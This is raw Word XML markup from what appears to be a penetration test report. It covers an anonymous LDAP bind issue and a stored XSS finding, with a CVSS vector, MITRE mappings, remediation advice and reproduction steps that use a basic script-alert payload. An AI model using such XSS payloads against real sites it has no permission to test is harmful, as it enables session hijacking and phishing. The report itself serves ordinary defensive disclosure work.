    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0640AD80" w14:textId="6A820B28">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479A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="471365D3" w14:textId="42B9CF44">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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="63F00C41" w14:textId="2EA3F123">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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="2DFA1280" w14:textId="0BD7FB8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>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Disable Anonymous LDAP Binds and configure the Active Directory server to reject anonymous bind requests. Do this by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modifying</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the </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dSHeuristics</w:t>
      </w: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 xml:space="preserve"> attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="479A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="6D9316F9" w14:textId="6F8791FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Restrict access to the LDAP service to trusted hosts and network segments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="499EE4E6" w14:textId="04E9DA31">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479A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="563F9EFE" w14:textId="338B4560">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79A564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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="20F0F5BB" w14:textId="61004752">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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f70ca3c5146b49cd">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="479A5644">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft Security Advisory ADV190023</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="479A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="51F4165A" w14:textId="5C6E31FA">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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7a0ab00a2bca452e">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="479A5644">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>How to check for anonymous LDAP binding</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="52A0FB55" w14:textId="78E00887">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="764EEAA4" w14:textId="2FE7B75C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EA56911" w:rsidP="0D325B6E" w:rsidRDefault="5EA56911" w14:paraId="1EE7B441" w14:textId="665032F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc527651894" w:id="85888170"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EA56911">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EA56911">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EA56911">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc551494069" w:id="115832493"/>
      <w:bookmarkStart w:name="_Toc1837593331" w:id="109725576"/>
      <w:bookmarkStart w:name="_Toc1339115304" w:id="545333636"/>
      <w:bookmarkStart w:name="_Toc527238768" w:id="1051722418"/>
      <w:bookmarkStart w:name="_Toc2016977061" w:id="1622258436"/>
      <w:bookmarkStart w:name="_Toc83529241" w:id="1087489445"/>
      <w:bookmarkStart w:name="_Toc1505062454" w:id="46024031"/>
      <w:bookmarkStart w:name="_Toc1382209096" w:id="32936749"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="15726C32">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stored XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1772C3EC">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no cookies)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115832493"/>
      <w:bookmarkEnd w:id="109725576"/>
      <w:bookmarkEnd w:id="545333636"/>
      <w:bookmarkEnd w:id="1051722418"/>
      <w:bookmarkEnd w:id="1622258436"/>
      <w:bookmarkEnd w:id="1087489445"/>
      <w:bookmarkEnd w:id="46024031"/>
      <w:bookmarkEnd w:id="32936749"/>
      <w:bookmarkEnd w:id="85888170"/>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4AE43604">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2E8FD62" w14:textId="58EB32C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D464C46" w14:textId="5D9C11D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3B70E6D" w14:textId="2859A01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E1E957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8D934EE" w14:textId="6A6C45F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2BB14BB" w14:textId="37C515E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22FFBBB" w:rsidP="0D325B6E" w:rsidRDefault="022FFBBB" w14:paraId="7A1905C2" w14:textId="4A4C4FAE">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022FFBBB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="32F17FE1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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6234532" w14:textId="0CE68D2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0A9A65C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3EC005C" w14:textId="4335C98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7928EC60" w14:textId="591C41B4">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0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="red"/>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FC98801"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77B99D04"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4A558CB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AE2726" w14:textId="4602F9F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FD767DF" w:rsidP="0D325B6E" w:rsidRDefault="2FD767DF" w14:paraId="243F5DED" w14:textId="21EEC71E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="Rffe00fbec9cd4e77">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2FD767DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N</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AC:L</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AT:N</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PR:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2FD767DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/UI:P/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2FD767DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VC:L</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VI:L</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VA:L</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SC:N</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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2FD767DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2FD767DF">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62E16B83">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6DBF0A" w14:textId="4A9984F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16C0D98" w:rsidP="0D325B6E" w:rsidRDefault="116C0D98" w14:paraId="43165B9A" w14:textId="43F6FCFE">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="116C0D98">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9965ABA" w:rsidP="0D325B6E" w:rsidRDefault="79965ABA" w14:paraId="15A06A11" w14:textId="0CB92FCC">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rab248e44450b49ea">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="79965ABA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1189</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0A4D8369">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="79965ABA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Drive-by Compromise</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="339C0D94">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982BF39"/>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011C8AB" w:rsidP="0D325B6E" w:rsidRDefault="6011C8AB" w14:paraId="3AD4AFD9" w14:textId="58143664">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="6011C8AB">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0D2817C" w:rsidP="0D325B6E" w:rsidRDefault="00D2817C" w14:paraId="4808D537" w14:textId="07782E00">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7432d11b53cc4a31">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00D2817C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0818</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="37F557B2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00D2817C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Validate Program Inputs</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00D2817C" w:rsidP="0D325B6E" w:rsidRDefault="00D2817C" w14:paraId="49B8E8E7" w14:textId="426F53D5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R76e4cd3c41574d05">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00D2817C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1021</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0523DF98">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00D2817C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Restrict Web-Based Content</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1518F14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5C57ABC" w14:textId="3B39C72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D74DDF4" w14:textId="480269A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D8AC3E4" w14:textId="2CFFA2C8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0A770A40" w:rsidP="0D325B6E" w:rsidRDefault="0A770A40" w14:paraId="65A32788" w14:textId="0968BE79">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>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0A770A4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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="7EDB40E6" w14:textId="4403806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Unsanitized</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user input is stored on the server and is sent to the client as HTML when viewed, allowing an attacker to run arbitrary JavaScript code on the client. This allows an attacker to upload a malicious script as user input, which when </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rendered</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by </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="507A3C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>another user or</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can alter the display of the websit</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e.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="184CFDFD" w14:textId="3C4D2F2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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="72907D9D" w14:textId="3CCC3710">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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="4F81E585" w14:textId="61766EA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This allows a malicious actor to manipulate other client sessions to </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render</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JavaScript code that can be used to </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render</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attacker-controlled </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HTML,and</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alter the functionality of the website for other users,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6CF0D5FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can be used to display a fake phishing login</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leading to user account compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D3D588B" w14:textId="7D76814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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="5C9F70DB" w14:textId="216EE568">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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="692E0E27" w14:textId="57345E2C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Step 1: Create a post with the following payload &lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="507A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="443138E2" w14:textId="37EB5D2A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Step 2: View the post</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="47E4C5FD" w14:textId="6F97128D">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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="17FF6F0F" w14:textId="66D69D0E">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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="3B41318A" w14:textId="1440B1D7">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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="3E882860" w14:textId="4720C5CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Validate and normalize all user input on the server with a whitelist if applicable. Always encode output and never store raw HTML or JavaScript from untrusted user input without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="507A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="56C83A4B" w14:textId="7DE11488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Web Application Firewall to block malicious JavaScript payloads. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="507A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="1F8408B0" w14:textId="58992483">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Utilize a strict Content Security Policy to restrict JavaScript sources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="507A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="5358C413" w14:textId="34D849F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Mark session cookie configurations such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="507A3C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HttpOnly</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07A3C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secure</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507A3C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="507A3C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
